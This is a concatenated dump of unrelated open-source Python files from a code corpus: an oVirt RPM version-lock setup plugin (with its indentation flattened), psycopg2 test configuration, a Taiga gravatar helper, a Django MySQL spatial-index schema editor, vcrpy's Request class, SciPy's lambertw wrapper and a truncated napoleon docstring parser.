class VersionLockTransaction(transaction.TransactionElement):
"""
        Version lock transaction element.
        Note that this is not a real transaction, but we need to
        rollback/commit the same way the packager does.
        We cannot actually prepare the transaction at preparation time,
        because the new packages are not installed yet.
        But we must restore the file, as we do not know what packages
        were locked at the previous version.
"""
_VERSIONLOCK_LIST_FILES = (
osetupcons.FileLocations.OVIRT_ENGINE_YUM_VERSIONLOCK,
osetupcons.FileLocations.OVIRT_ENGINE_DNF_VERSIONLOCK,
)
def _filterVersionLock(self):
modified = {}
content = {}
for versionlock_list_file in self._VERSIONLOCK_LIST_FILES:
modified[versionlock_list_file] = False
content[versionlock_list_file] = []
if os.path.exists(versionlock_list_file):
with open(versionlock_list_file, 'r') as f:
for line in f.read().splitlines():
found = False
for pattern in self.environment[
osetupcons.RPMDistroEnv.VERSION_LOCK_FILTER
]:
if line.find(pattern) != -1:
found = True
break
if not found:
content[versionlock_list_file].append(line)
else:
modified[versionlock_list_file] = True
return (modified, content)
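        # Hypothetical example of the filtering above: with
        # VERSION_LOCK_FILTER == ['ovirt-engine'], a lock file holding one
        # matching entry and one unrelated entry yields modified[f] == True
        # and content[f] containing only the unrelated entry.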
@property
def environment(self):
return self._parent.environment
def __init__(self, parent):
self._parent = parent
self._backup = {}
def __str__(self):
return _("Version Lock Transaction")
def prepare(self):
if not self._parent._enabled:
return
modified, content = self._filterVersionLock()
for versionlock_list_file in self._VERSIONLOCK_LIST_FILES:
if modified[versionlock_list_file]:
self._backup[versionlock_list_file] = '%s.%s' % (
versionlock_list_file,
datetime.datetime.now().strftime('%Y%m%d%H%M%S'),
)
os.rename(
versionlock_list_file,
self._backup[versionlock_list_file],
)
with open(
versionlock_list_file,
'w'
) as f:
f.write(
'\n'.join(content[versionlock_list_file]) + '\n'
)
def abort(self):
for versionlock_list_file in self._VERSIONLOCK_LIST_FILES:
if (
versionlock_list_file in self._backup and
os.path.exists(self._backup[versionlock_list_file])
):
os.rename(
self._backup[versionlock_list_file],
versionlock_list_file,
)
def commit(self):
            # This must always be executed so we can be sure we are locked.
            # Execute rpm directly; yum is not reliable for offline usage.
if self.environment[osetupcons.RPMDistroEnv.VERSION_LOCK_APPLY]:
rc, out, err = self._parent.execute(
args=(
self._parent.command.get('rpm'),
'-q',
) + tuple(
set(
self.environment[
osetupcons.RPMDistroEnv.VERSION_LOCK_APPLY
]
)
),
)
changes = []
for line in out:
changes.append(
{
'added': line,
}
)
versionlock_uninstall_group = self.environment[
osetupcons.CoreEnv.REGISTER_UNINSTALL_GROUPS
].createGroup(
group='versionlock',
description='YUM version locking configuration',
optional=False
)
modified, content = self._filterVersionLock()
for versionlock_list_file in self._VERSIONLOCK_LIST_FILES:
self.environment[
osetupcons.CoreEnv.UNINSTALL_UNREMOVABLE_FILES
].append(versionlock_list_file)
if os.path.exists(versionlock_list_file):
versionlock_uninstall_group.addChanges(
'versionlock',
versionlock_list_file,
changes,
)
content[versionlock_list_file].extend(out)
with open(
versionlock_list_file,
'w',
) as f:
f.write(
'\n'.join(
content[versionlock_list_file]
) + '\n'
)
def _getSink(self):
pm = self._PM
class MyPMSink(self._MiniPMSinkBase):
def __init__(self, log):
super(MyPMSink, self).__init__()
self._log = log
def verbose(self, msg):
super(MyPMSink, self).verbose(msg)
self._log.debug('%s %s', pm, msg)
def info(self, msg):
super(MyPMSink, self).info(msg)
self._log.info('%s %s', pm, msg)
def error(self, msg):
super(MyPMSink, self).error(msg)
self._log.error('%s %s', pm, msg)
return MyPMSink(self.logger)
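    # The sink above simply mirrors package-manager output into the plugin
    # logger; e.g. (hypothetically) sink.info('Resolving dependencies') logs
    # '<PM> Resolving dependencies' at INFO level.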
def _checkForPackagesUpdate(self, packages):
update = []
mpm = self._MiniPM(
sink=self._getSink(),
disabledPlugins=('versionlock',),
)
for package in packages:
with mpm.transaction():
mpm.update(packages=(package,))
if mpm.buildTransaction():
if mpm.queryTransaction():
update.append(package)
return update
def _checkForProductUpdate(self):
# TODO: otopi is now providing minidnf too
missingRollback = []
upgradeAvailable = False
mpm = self._MiniPM(
sink=self._getSink(),
disabledPlugins=('versionlock',),
)
plist = []
with mpm.transaction():
groups = [group['name'] for group in mpm.queryGroups()]
for entry in self.environment[
osetupcons.RPMDistroEnv.PACKAGES_UPGRADE_LIST
]:
if 'group' in entry and entry['group'] in groups:
mpm.updateGroup(group=entry['group'])
else:
mpm.installUpdate(packages=entry['packages'])
if mpm.buildTransaction():
upgradeAvailable = True
for p in mpm.queryTransaction():
self.logger.debug('PACKAGE: [%s] %s' % (
p['operation'],
p['display_name']
))
plist.append(
_(
'PACKAGE: [{operation}] {display_name}'
).format(
operation=p['operation'],
display_name=p['display_name']
)
)
# Verify all installed packages available in yum
for package in mpm.queryTransaction():
installed = False
reinstall_available = False
for query in mpm.queryPackages(
patterns=(package['display_name'],),
showdups=True,
):
self.logger.debug(
'dupes: operation [%s] package %s' % (
query['operation'],
query['display_name'],
)
)
if query['operation'] == 'installed':
installed = True
if query['operation'] == 'reinstall_available':
reinstall_available = True
if installed and not reinstall_available:
missingRollback.append(package['display_name'])
return (upgradeAvailable, set(missingRollback), plist)
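    # Hypothetical outcome of the check above: when an installed package has a
    # newer build in an enabled repository, upgradeAvailable is True and plist
    # holds entries such as 'PACKAGE: [update] <name>-<version>'; installed
    # packages with no reinstall candidate land in missingRollback.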
def __init__(self, context):
super(Plugin, self).__init__(context=context)
self._shouldResultVersionLock = False
self._enabled = False
self._distribution = platform.linux_distribution(
full_distribution_name=0
)[0]
@plugin.event(
stage=plugin.Stages.STAGE_INIT,
)
def _init(self):
self.environment.setdefault(
osetupcons.RPMDistroEnv.ENABLE_UPGRADE,
None
)
self.environment.setdefault(
osetupcons.RPMDistroEnv.REQUIRE_ROLLBACK,
None
)
self.environment.setdefault(
osetupcons.RPMDistroEnv.VERSION_LOCK_APPLY,
[]
)
self.environment.setdefault(
osetupcons.RPMDistroEnv.VERSION_LOCK_FILTER,
[]
)
self.environment[
osetupcons.RPMDistroEnv.PACKAGES_UPGRADE_LIST
] = []
self.environment[
osetupcons.RPMDistroEnv.PACKAGES_SETUP
] = []
@plugin.event(
stage=plugin.Stages.STAGE_SETUP,
condition=lambda self: (
not self.environment[
osetupcons.CoreEnv.DEVELOPER_MODE
] and
self._distribution in ('redhat', 'fedora', 'centos')
),
)
def _setup(self):
self.command.detect('rpm')
self.environment[otopicons.CoreEnv.MAIN_TRANSACTION].append(
self.VersionLockTransaction(
parent=self,
)
)
if not self.environment[
osetupcons.CoreEnv.OFFLINE_PACKAGER
]:
self._PM, self._MiniPM, self._MiniPMSinkBase = (
osetuputil.getPackageManager(self.logger)
)
self._enabled = True
@plugin.event(
stage=plugin.Stages.STAGE_CUSTOMIZATION,
name=osetupcons.Stages.DISTRO_RPM_PACKAGE_UPDATE_CHECK,
before=(
osetupcons.Stages.DIALOG_TITLES_E_PACKAGES,
),
after=(
osetupcons.Stages.DIALOG_TITLES_S_PACKAGES,
),
condition=lambda self: self._enabled,
)
def _customization(self):
# assume we have nothing to do
self._enabled = False
upgradeAvailable = None
missingRollback = None
if self.environment[osetupcons.RPMDistroEnv.ENABLE_UPGRADE] is None:
self.logger.info(_('Checking for product updates...'))
(
upgradeAvailable,
missingRollback,
plist,
) = self._checkForProductUpdate()
if not upgradeAvailable:
self.logger.info(_('No product updates found'))
else:
self.environment[
osetupcons.RPMDistroEnv.ENABLE_UPGRADE
] = dialog.queryBoolean(
dialog=self.dialog,
name='OVESETUP_RPMDISTRO_PACKAGE_UPGRADE',
note=_(
'Setup has found updates for some packages:\n'
'{plist}\n'
'do you wish to update them now? '
'(@VALUES@) [@DEFAULT@]: '
).format(
plist='\n'.join(plist)
),
prompt=True,
true=_('Yes'),
false=_('No'),
default=True,
)
if self.environment[osetupcons.RPMDistroEnv.ENABLE_UPGRADE]:
self.logger.info(_('Checking for an update for Setup...'))
update = self._checkForPackagesUpdate(
packages=self.environment[
osetupcons.RPMDistroEnv.PACKAGES_SETUP
],
)
if update:
self.dialog.note(
text=_(
'An update for the Setup packages {packages} was '
'found. Please update that package by running:\n'
'"{pm} update {packages}"\nand then execute Setup '
'again.'
).format(
pm=self._PM.lower(),
packages=' '.join(update),
),
)
raise RuntimeError(_('Please update the Setup packages'))
if upgradeAvailable is None:
(
upgradeAvailable,
missingRollback,
plist,
) = self._checkForProductUpdate()
if not upgradeAvailable:
self.dialog.note(text=_('No update for Setup found'))
else:
if missingRollback:
if self.environment[
osetupcons.RPMDistroEnv.REQUIRE_ROLLBACK
] is None:
self.environment[
osetupcons.RPMDistroEnv.REQUIRE_ROLLBACK
] = dialog.queryBoolean(
dialog=self.dialog,
name='OVESETUP_RPMDISTRO_REQUIRE_ROLLBACK',
note=_(
                            'Setup will not be able to roll back new '
'packages in case of a failure, because '
'the following installed packages were not '
'found in enabled repositories:\n\n'
'{missingRollback}\n'
'Do you want to abort Setup? '
'(@VALUES@) [@DEFAULT@]: '
).format(
missingRollback='\n'.join(
list(missingRollback)
),
),
prompt=True,
true=_('Yes'),
false=_('No'),
default=True,
)
if self.environment[
osetupcons.RPMDistroEnv.REQUIRE_ROLLBACK
]:
raise RuntimeError(
_('Package rollback information is unavailable')
)
#
            # Disable yum rollback on transaction failure,
            # as RHEL yum will remove packages that were updated
            # without installing the previous ones.
#
self.environment[
otopicons.PackEnv.YUM_ROLLBACK
] = False
self._enabled = self.environment[
osetupcons.RPMDistroEnv.ENABLE_UPGRADE
]
if not self._enabled and upgradeAvailable:
raise RuntimeError(
_('Aborted, packages must be updated')
)
@plugin.event(
stage=plugin.Stages.STAGE_PACKAGES,
condition=lambda self: self._enabled,
)
def packages(self):
groups = [group['name'] for group in self.packager.queryGroups()]
for entry in self.environment[
osetupcons.RPMDistroEnv.PACKAGES_UPGRADE_LIST
]:
if 'group' in entry and entry['group'] in groups:
self.packager.updateGroup(group=entry['group'])
else:
self.packager.installUpdate(packages=entry['packages'])
# vim: expandtab tabstop=4 shiftwidth=4
| apache-2.0 |
zxjzxj9/FlaskBoard | web/lib/python2.7/site-packages/psycopg2/tests/testconfig.py | 10 | 1249 | # Configure the test suite from the env variables.
import os
dbname = os.environ.get('PSYCOPG2_TESTDB', 'psycopg2_test')
dbhost = os.environ.get('PSYCOPG2_TESTDB_HOST', None)
dbport = os.environ.get('PSYCOPG2_TESTDB_PORT', None)
dbuser = os.environ.get('PSYCOPG2_TESTDB_USER', None)
dbpass = os.environ.get('PSYCOPG2_TESTDB_PASSWORD', None)
repl_dsn = os.environ.get('PSYCOPG2_TEST_REPL_DSN',
"dbname=psycopg2_test replication=1")
# Check if we want to test psycopg's green path.
green = os.environ.get('PSYCOPG2_TEST_GREEN', None)
if green:
if green == '1':
from psycopg2.extras import wait_select as wait_callback
elif green == 'eventlet':
from eventlet.support.psycopg2_patcher import eventlet_wait_callback \
as wait_callback
else:
raise ValueError("please set 'PSYCOPG2_TEST_GREEN' to a valid value")
import psycopg2.extensions
psycopg2.extensions.set_wait_callback(wait_callback)
# Construct a DSN to connect to the test database:
dsn = 'dbname=%s' % dbname
if dbhost is not None:
dsn += ' host=%s' % dbhost
if dbport is not None:
dsn += ' port=%s' % dbport
if dbuser is not None:
dsn += ' user=%s' % dbuser
if dbpass is not None:
dsn += ' password=%s' % dbpass
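# For example (hypothetical values), PSYCOPG2_TESTDB_HOST=localhost and
# PSYCOPG2_TESTDB_USER=postgres would yield:
#   dsn == 'dbname=psycopg2_test host=localhost user=postgres'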
| apache-2.0 |
dayatz/taiga-back | taiga/users/gravatar.py | 1 | 1419 | # -*- coding: utf-8 -*-
# Copyright (C) 2014-2017 Andrey Antukh <[email protected]>
# Copyright (C) 2014-2017 Jesús Espino <[email protected]>
# Copyright (C) 2014-2017 David Barragán <[email protected]>
# Copyright (C) 2014-2017 Alejandro Alonso <[email protected]>
# Copyright (C) 2014-2017 Anler Hernández <[email protected]>
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import hashlib
def get_gravatar_id(email: str) -> str:
"""Get the gravatar id associated to an email.
:return: Gravatar id.
"""
return hashlib.md5(email.lower().encode()).hexdigest()
def get_user_gravatar_id(user: object) -> str:
"""Get the gravatar id associated to a user.
:return: Gravatar id.
"""
if user and user.email:
return get_gravatar_id(user.email)
return None
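# Minimal usage sketch (the address is a hypothetical example):
#   get_gravatar_id('[email protected]')
# returns the hex MD5 digest of the lowercased address, suitable for
# building a URL like https://www.gravatar.com/avatar/<id>.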
| agpl-3.0 |
JakeBrand/CMPUT410-E6 | v1/lib/python2.7/site-packages/django/contrib/gis/db/backends/mysql/schema.py | 57 | 3048 | import logging
from django.contrib.gis.db.models.fields import GeometryField
from django.db.utils import OperationalError
from django.db.backends.mysql.schema import DatabaseSchemaEditor
logger = logging.getLogger('django.contrib.gis')
class MySQLGISSchemaEditor(DatabaseSchemaEditor):
sql_add_spatial_index = 'CREATE SPATIAL INDEX %(index)s ON %(table)s(%(column)s)'
sql_drop_spatial_index = 'DROP INDEX %(index)s ON %(table)s'
def __init__(self, *args, **kwargs):
super(MySQLGISSchemaEditor, self).__init__(*args, **kwargs)
self.geometry_sql = []
def skip_default(self, field):
return (
super(MySQLGISSchemaEditor, self).skip_default(field) or
# Geometry fields are stored as BLOB/TEXT and can't have defaults.
isinstance(field, GeometryField)
)
def column_sql(self, model, field, include_default=False):
column_sql = super(MySQLGISSchemaEditor, self).column_sql(model, field, include_default)
# MySQL doesn't support spatial indexes on NULL columns
if isinstance(field, GeometryField) and field.spatial_index and not field.null:
qn = self.connection.ops.quote_name
db_table = model._meta.db_table
self.geometry_sql.append(
self.sql_add_spatial_index % {
'index': qn(self._create_spatial_index_name(model, field)),
'table': qn(db_table),
'column': qn(field.column),
}
)
return column_sql
def create_model(self, model):
super(MySQLGISSchemaEditor, self).create_model(model)
self.create_spatial_indexes()
def add_field(self, model, field):
super(MySQLGISSchemaEditor, self).add_field(model, field)
self.create_spatial_indexes()
def remove_field(self, model, field):
if isinstance(field, GeometryField) and field.spatial_index:
qn = self.connection.ops.quote_name
sql = self.sql_drop_spatial_index % {
'index': qn(self._create_spatial_index_name(model, field)),
'table': qn(model._meta.db_table),
}
try:
self.execute(sql)
except OperationalError:
logger.error(
"Couldn't remove spatial index: %s (may be expected "
"if your storage engine doesn't support them)." % sql
)
super(MySQLGISSchemaEditor, self).remove_field(model, field)
def _create_spatial_index_name(self, model, field):
return '%s_%s_id' % (model._meta.db_table, field.column)
def create_spatial_indexes(self):
for sql in self.geometry_sql:
try:
self.execute(sql)
except OperationalError:
logger.error(
"Cannot create SPATIAL INDEX %s. Only MyISAM and (as of "
"MySQL 5.7.5) InnoDB support them." % sql
)
self.geometry_sql = []
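    # Illustrative DDL (hypothetical model): for a spatially indexed, NOT NULL
    # ``point`` column on table ``myapp_city``, column_sql() queues
    #   CREATE SPATIAL INDEX `myapp_city_point_id` ON `myapp_city`(`point`)
    # and create_spatial_indexes() executes it once the table exists.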
| apache-2.0 |
aclevy/vcrpy | vcr/request.py | 3 | 3068 | from six import BytesIO, text_type
from six.moves.urllib.parse import urlparse, parse_qsl
class Request(object):
"""
VCR's representation of a request.
There is a weird quirk in HTTP. You can send the same header twice. For
this reason, headers are represented by a dict, with lists as the values.
However, it appears that HTTPlib is completely incapable of sending the
same header twice. This puts me in a weird position: I want to be able to
accurately represent HTTP headers in cassettes, but I don't want the extra
step of always having to do [0] in the general case, i.e.
request.headers['key'][0]
In addition, some servers sometimes send the same header more than once,
and httplib *can* deal with this situation.
    Furthermore, I wanted to keep the request and response cassette formats
    as similar as possible.
For this reason, in cassettes I keep a dict with lists as keys, but once
deserialized into VCR, I keep them as plain, naked dicts.
"""
def __init__(self, method, uri, body, headers):
self.method = method
self.uri = uri
self._was_file = hasattr(body, 'read')
if self._was_file:
self.body = body.read()
else:
self.body = body
self.headers = {}
for key in headers:
self.add_header(key, headers[key])
@property
def body(self):
return BytesIO(self._body) if self._was_file else self._body
@body.setter
def body(self, value):
if isinstance(value, text_type):
value = value.encode('utf-8')
self._body = value
def add_header(self, key, value):
# see class docstring for an explanation
if isinstance(value, (tuple, list)):
self.headers[key] = value[0]
else:
self.headers[key] = value
@property
def scheme(self):
return urlparse(self.uri).scheme
@property
def host(self):
return urlparse(self.uri).hostname
@property
def port(self):
parse_uri = urlparse(self.uri)
port = parse_uri.port
if port is None:
port = {'https': 443, 'http': 80}[parse_uri.scheme]
return port
@property
def path(self):
return urlparse(self.uri).path
@property
def query(self):
q = urlparse(self.uri).query
return sorted(parse_qsl(q))
# alias for backwards compatibility
@property
def url(self):
return self.uri
# alias for backwards compatibility
@property
def protocol(self):
return self.scheme
def __str__(self):
return "<Request ({0}) {1}>".format(self.method, self.uri)
def __repr__(self):
return self.__str__()
def _to_dict(self):
return {
'method': self.method,
'uri': self.uri,
'body': self.body,
'headers': dict(((k, [v]) for k, v in self.headers.items())),
}
@classmethod
def _from_dict(cls, dct):
return Request(**dct)
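# Minimal usage sketch (values are illustrative):
#   req = Request('GET', 'http://example.com/a?x=1', '', {'Accept': ['text/html']})
#   req.headers['Accept']  # 'text/html' -- the single-item list is collapsed
#   req.port               # 80, inferred from the http scheme
#   req.query              # [('x', '1')]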
| mit |
DailyActie/Surrogate-Model | 01-codes/scipy-master/scipy/special/lambertw.py | 33 | 3041 | from __future__ import division, print_function, absolute_import
from ._ufuncs import _lambertw
def lambertw(z, k=0, tol=1e-8):
r"""
lambertw(z, k=0, tol=1e-8)
Lambert W function.
The Lambert W function `W(z)` is defined as the inverse function
of ``w * exp(w)``. In other words, the value of ``W(z)`` is
such that ``z = W(z) * exp(W(z))`` for any complex number
``z``.
The Lambert W function is a multivalued function with infinitely
many branches. Each branch gives a separate solution of the
equation ``z = w exp(w)``. Here, the branches are indexed by the
integer `k`.
Parameters
----------
z : array_like
Input argument.
k : int, optional
Branch index.
tol : float, optional
Evaluation tolerance.
Returns
-------
w : array
`w` will have the same shape as `z`.
Notes
-----
All branches are supported by `lambertw`:
* ``lambertw(z)`` gives the principal solution (branch 0)
* ``lambertw(z, k)`` gives the solution on branch `k`
The Lambert W function has two partially real branches: the
principal branch (`k = 0`) is real for real ``z > -1/e``, and the
``k = -1`` branch is real for ``-1/e < z < 0``. All branches except
``k = 0`` have a logarithmic singularity at ``z = 0``.
**Possible issues**
The evaluation can become inaccurate very close to the branch point
at ``-1/e``. In some corner cases, `lambertw` might currently
fail to converge, or can end up on the wrong branch.
**Algorithm**
Halley's iteration is used to invert ``w * exp(w)``, using a first-order
asymptotic approximation (O(log(w)) or `O(w)`) as the initial estimate.
The definition, implementation and choice of branches is based on [2]_.
See Also
--------
wrightomega : the Wright Omega function
References
----------
.. [1] http://en.wikipedia.org/wiki/Lambert_W_function
.. [2] Corless et al, "On the Lambert W function", Adv. Comp. Math. 5
(1996) 329-359.
http://www.apmaths.uwo.ca/~djeffrey/Offprints/W-adv-cm.pdf
Examples
--------
The Lambert W function is the inverse of ``w exp(w)``:
>>> from scipy.special import lambertw
>>> w = lambertw(1)
>>> w
(0.56714329040978384+0j)
>>> w * np.exp(w)
(1.0+0j)
Any branch gives a valid inverse:
>>> w = lambertw(1, k=3)
>>> w
(-2.8535817554090377+17.113535539412148j)
>>> w*np.exp(w)
(1.0000000000000002+1.609823385706477e-15j)
**Applications to equation-solving**
The Lambert W function may be used to solve various kinds of
equations, such as finding the value of the infinite power
tower :math:`z^{z^{z^{\ldots}}}`:
>>> def tower(z, n):
... if n == 0:
... return z
... return z ** tower(z, n-1)
...
>>> tower(0.5, 100)
0.641185744504986
>>> -lambertw(-np.log(0.5)) / np.log(0.5)
(0.64118574450498589+0j)
"""
return _lambertw(z, k, tol)
| mit |
kdwink/intellij-community | python/helpers/sphinxcontrib/napoleon/docstring.py | 44 | 32526 | # -*- coding: utf-8 -*-
# Copyright 2014 Rob Ruana
# Licensed under the BSD License, see LICENSE file for details.
"""Classes for docstring parsing and formatting."""
import collections
import inspect
import re
import sys
from six.moves import range
from pockets import modify_iter
from six import string_types
_directive_regex = re.compile(r'\.\. \S+::')
_google_section_regex = re.compile(r'^(\s|\w)+:\s*$')
_google_typed_arg_regex = re.compile(r'\s*(.+?)\s*\(\s*(.+?)\s*\)')
_numpy_section_regex = re.compile(r'^[=\-`:\'"~^_*+#<>]{2,}\s*$')
_xref_regex = re.compile(r'(:\w+:\S+:`.+?`|:\S+:`.+?`|`.+?`)')
class GoogleDocstring(object):
"""Convert Google style docstrings to reStructuredText.
Parameters
----------
docstring : str or List[str]
The docstring to parse, given either as a string or split into
individual lines.
config : Optional[sphinxcontrib.napoleon.Config or sphinx.config.Config]
        The configuration settings to use. If not given, defaults to the
        config object on `app`; or, if `app` is not given, defaults to a
        new `sphinxcontrib.napoleon.Config` object.
See Also
--------
:class:`sphinxcontrib.napoleon.Config`
Other Parameters
----------------
app : Optional[sphinx.application.Sphinx]
Application object representing the Sphinx process.
what : Optional[str]
A string specifying the type of the object to which the docstring
belongs. Valid values: "module", "class", "exception", "function",
"method", "attribute".
name : Optional[str]
The fully qualified name of the object.
obj : module, class, exception, function, method, or attribute
The object to which the docstring belongs.
options : Optional[sphinx.ext.autodoc.Options]
The options given to the directive: an object with attributes
inherited_members, undoc_members, show_inheritance and noindex that
are True if the flag option of same name was given to the auto
directive.
Example
-------
>>> from sphinxcontrib.napoleon import Config
>>> config = Config(napoleon_use_param=True, napoleon_use_rtype=True)
>>> docstring = '''One line summary.
...
... Extended description.
...
... Args:
... arg1(int): Description of `arg1`
... arg2(str): Description of `arg2`
... Returns:
... str: Description of return value.
... '''
>>> print(GoogleDocstring(docstring, config))
One line summary.
<BLANKLINE>
Extended description.
<BLANKLINE>
:param arg1: Description of `arg1`
:type arg1: int
:param arg2: Description of `arg2`
:type arg2: str
<BLANKLINE>
:returns: Description of return value.
:rtype: str
<BLANKLINE>
"""
def __init__(self, docstring, config=None, app=None, what='', name='',
obj=None, options=None):
self._config = config
self._app = app
if not self._config:
from sphinxcontrib.napoleon import Config
self._config = self._app and self._app.config or Config()
if not what:
if inspect.isclass(obj):
what = 'class'
elif inspect.ismodule(obj):
what = 'module'
elif isinstance(obj, collections.Callable):
what = 'function'
else:
what = 'object'
self._what = what
self._name = name
self._obj = obj
self._opt = options
if isinstance(docstring, string_types):
docstring = docstring.splitlines()
self._lines = docstring
self._line_iter = modify_iter(docstring, modifier=lambda s: s.rstrip())
self._parsed_lines = []
self._is_in_section = False
self._section_indent = 0
if not hasattr(self, '_directive_sections'):
self._directive_sections = []
if not hasattr(self, '_sections'):
self._sections = {
'args': self._parse_parameters_section,
'arguments': self._parse_parameters_section,
'attributes': self._parse_attributes_section,
'example': self._parse_examples_section,
'examples': self._parse_examples_section,
'keyword args': self._parse_keyword_arguments_section,
'keyword arguments': self._parse_keyword_arguments_section,
'methods': self._parse_methods_section,
'note': self._parse_note_section,
'notes': self._parse_notes_section,
'other parameters': self._parse_other_parameters_section,
'parameters': self._parse_parameters_section,
'return': self._parse_returns_section,
'returns': self._parse_returns_section,
'raises': self._parse_raises_section,
'references': self._parse_references_section,
'see also': self._parse_see_also_section,
'warning': self._parse_warning_section,
'warnings': self._parse_warning_section,
'warns': self._parse_warns_section,
'yield': self._parse_yields_section,
'yields': self._parse_yields_section,
}
self._parse()
def __str__(self):
"""Return the parsed docstring in reStructuredText format.
Returns
-------
str
UTF-8 encoded version of the docstring.
"""
if sys.version_info[0] >= 3:
return self.__unicode__()
else:
return self.__unicode__().encode('utf8')
def __unicode__(self):
"""Return the parsed docstring in reStructuredText format.
Returns
-------
unicode
Unicode version of the docstring.
"""
return u'\n'.join(self.lines())
def lines(self):
"""Return the parsed lines of the docstring in reStructuredText format.
Returns
-------
List[str]
The lines of the docstring in a list.
"""
return self._parsed_lines
def _consume_indented_block(self, indent=1):
lines = []
line = self._line_iter.peek()
while(not self._is_section_break() and
(not line or self._is_indented(line, indent))):
lines.append(next(self._line_iter))
line = self._line_iter.peek()
return lines
def _consume_contiguous(self):
lines = []
while (self._line_iter.has_next() and
self._line_iter.peek() and
not self._is_section_header()):
lines.append(next(self._line_iter))
return lines
def _consume_empty(self):
lines = []
line = self._line_iter.peek()
while self._line_iter.has_next() and not line:
lines.append(next(self._line_iter))
line = self._line_iter.peek()
return lines
def _consume_field(self, parse_type=True, prefer_type=False):
line = next(self._line_iter)
before, colon, after = self._partition_field_on_colon(line)
_name, _type, _desc = before, '', after
if parse_type:
match = _google_typed_arg_regex.match(before)
if match:
_name = match.group(1)
_type = match.group(2)
if _name[:2] == '**':
_name = r'\*\*'+_name[2:]
elif _name[:1] == '*':
_name = r'\*'+_name[1:]
if prefer_type and not _type:
_type, _name = _name, _type
indent = self._get_indent(line) + 1
_desc = [_desc] + self._dedent(self._consume_indented_block(indent))
_desc = self.__class__(_desc, self._config).lines()
return _name, _type, _desc
def _consume_fields(self, parse_type=True, prefer_type=False):
self._consume_empty()
fields = []
while not self._is_section_break():
_name, _type, _desc = self._consume_field(parse_type, prefer_type)
if _name or _type or _desc:
fields.append((_name, _type, _desc,))
return fields
def _consume_inline_attribute(self):
line = next(self._line_iter)
_type, colon, _desc = self._partition_field_on_colon(line)
if not colon:
_type, _desc = _desc, _type
_desc = [_desc] + self._dedent(self._consume_to_end())
_desc = self.__class__(_desc, self._config).lines()
return _type, _desc
def _consume_returns_section(self):
lines = self._dedent(self._consume_to_next_section())
if lines:
before, colon, after = self._partition_field_on_colon(lines[0])
_name, _type, _desc = '', '', lines
if colon:
if after:
_desc = [after] + lines[1:]
else:
_desc = lines[1:]
match = _google_typed_arg_regex.match(before)
if match:
_name = match.group(1)
_type = match.group(2)
else:
_type = before
_desc = self.__class__(_desc, self._config).lines()
return [(_name, _type, _desc,)]
else:
return []
def _consume_usage_section(self):
lines = self._dedent(self._consume_to_next_section())
return lines
def _consume_section_header(self):
section = next(self._line_iter)
stripped_section = section.strip(':')
if stripped_section.lower() in self._sections:
section = stripped_section
return section
def _consume_to_end(self):
lines = []
while self._line_iter.has_next():
lines.append(next(self._line_iter))
return lines
def _consume_to_next_section(self):
self._consume_empty()
lines = []
while not self._is_section_break():
lines.append(next(self._line_iter))
return lines + self._consume_empty()
def _dedent(self, lines, full=False):
if full:
return [line.lstrip() for line in lines]
else:
min_indent = self._get_min_indent(lines)
return [line[min_indent:] for line in lines]
def _format_admonition(self, admonition, lines):
lines = self._strip_empty(lines)
if len(lines) == 1:
return ['.. %s:: %s' % (admonition, lines[0].strip()), '']
elif lines:
lines = self._indent(self._dedent(lines), 3)
return ['.. %s::' % admonition, ''] + lines + ['']
else:
return ['.. %s::' % admonition, '']
def _format_block(self, prefix, lines, padding=None):
if lines:
if padding is None:
padding = ' ' * len(prefix)
result_lines = []
for i, line in enumerate(lines):
if i == 0:
result_lines.append((prefix + line).rstrip())
elif line:
result_lines.append(padding + line)
else:
result_lines.append('')
return result_lines
else:
return [prefix]
def _format_field(self, _name, _type, _desc):
_desc = self._strip_empty(_desc)
has_desc = any(_desc)
separator = has_desc and ' -- ' or ''
if _name:
if _type:
if '`' in _type:
field = '**%s** (%s)%s' % (_name, _type, separator)
else:
field = '**%s** (*%s*)%s' % (_name, _type, separator)
else:
field = '**%s**%s' % (_name, separator)
elif _type:
if '`' in _type:
field = '%s%s' % (_type, separator)
else:
field = '*%s*%s' % (_type, separator)
else:
field = ''
if has_desc:
return [field + _desc[0]] + _desc[1:]
else:
return [field]
def _format_fields(self, field_type, fields):
field_type = ':%s:' % field_type.strip()
padding = ' ' * len(field_type)
multi = len(fields) > 1
lines = []
for _name, _type, _desc in fields:
field = self._format_field(_name, _type, _desc)
if multi:
if lines:
lines.extend(self._format_block(padding + ' * ', field))
else:
lines.extend(self._format_block(field_type + ' * ', field))
else:
lines.extend(self._format_block(field_type + ' ', field))
if lines and lines[-1]:
lines.append('')
return lines
def _get_current_indent(self, peek_ahead=0):
line = self._line_iter.peek(peek_ahead + 1)[peek_ahead]
while line != self._line_iter.sentinel:
if line:
return self._get_indent(line)
peek_ahead += 1
line = self._line_iter.peek(peek_ahead + 1)[peek_ahead]
return 0
def _get_indent(self, line):
for i, s in enumerate(line):
if not s.isspace():
return i
return len(line)
def _get_min_indent(self, lines):
min_indent = None
for line in lines:
if line:
indent = self._get_indent(line)
if min_indent is None:
min_indent = indent
elif indent < min_indent:
min_indent = indent
return min_indent or 0
def _indent(self, lines, n=4):
return [(' ' * n) + line for line in lines]
def _is_indented(self, line, indent=1):
for i, s in enumerate(line):
if i >= indent:
return True
elif not s.isspace():
return False
return False
def _is_section_header(self):
section = self._line_iter.peek().lower()
match = _google_section_regex.match(section)
if match and section.strip(':') in self._sections:
header_indent = self._get_indent(section)
section_indent = self._get_current_indent(peek_ahead=1)
return section_indent > header_indent
elif self._directive_sections:
if _directive_regex.match(section):
for directive_section in self._directive_sections:
if section.startswith(directive_section):
return True
return False
def _is_section_break(self):
line = self._line_iter.peek()
return (not self._line_iter.has_next() or
self._is_section_header() or
(self._is_in_section and
line and
not self._is_indented(line, self._section_indent)))
def _parse(self):
self._parsed_lines = self._consume_empty()
if self._name and (self._what == 'attribute' or self._what == 'data'):
self._parsed_lines.extend(self._parse_attribute_docstring())
return
while self._line_iter.has_next():
if self._is_section_header():
try:
section = self._consume_section_header()
self._is_in_section = True
self._section_indent = self._get_current_indent()
if _directive_regex.match(section):
lines = [section] + self._consume_to_next_section()
else:
lines = self._sections[section.lower()](section)
finally:
